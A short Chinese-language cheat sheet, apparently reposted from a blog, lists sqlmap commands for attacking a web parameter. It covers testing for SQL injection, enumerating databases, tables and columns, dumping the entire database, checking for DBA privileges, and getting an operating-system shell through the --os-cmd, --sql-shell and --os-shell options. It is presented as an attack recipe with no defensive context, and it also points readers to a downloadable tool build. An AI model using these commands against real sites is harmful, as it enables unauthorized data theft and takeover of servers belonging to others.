1、基本注入(这个工具kali或者bt下面有集成的,这里附加一个window免py版,提取码:3ldv)
sqlmap -u http://url/xx.php?id=1 判断注入
sqlmap -u http://url/xx.php?id=1 --dba 查找数据库
sqlmap -u http://url/xx.php?id=1 --tables -D ‘db_name‘ 查找表
sqlmap -u http://url/xx.php?id=1 --columns -T ‘table_name‘ 查找列
sqlmap -u http://url/xx.php?id=1 --dump -C ‘column_name‘ 爆数据
sqlmap -u http://url/xx.php?id=1 --dump-all 脱裤(成功以后默认在bin/output目录下)
2、进阶
sqlmap -u http://url/xx.php?id=1 --is-dba 判断是否是dba权限
sqlmap -u http://url/xx.php?id=1 --users 查看用户
sqlmap -u http://url/xx.php?id=1 --privilege 判断权限
3、cookie注入
4、post注入
5、shell(这个需要知道网站目录,并且magic_quotes_off必需为off状态)
sqlmap -u http://url/xx.php?id=1 --os-cmd=command
sqlmap -u http://url/xx.php?id=1 --sql-shell
然后可以执行sql语句
sqlmap -u http://url/xx.php?id=1 --os-shell 直接获得系统的shell
原文:http://www.cnblogs.com/BloodZero/p/4424928.html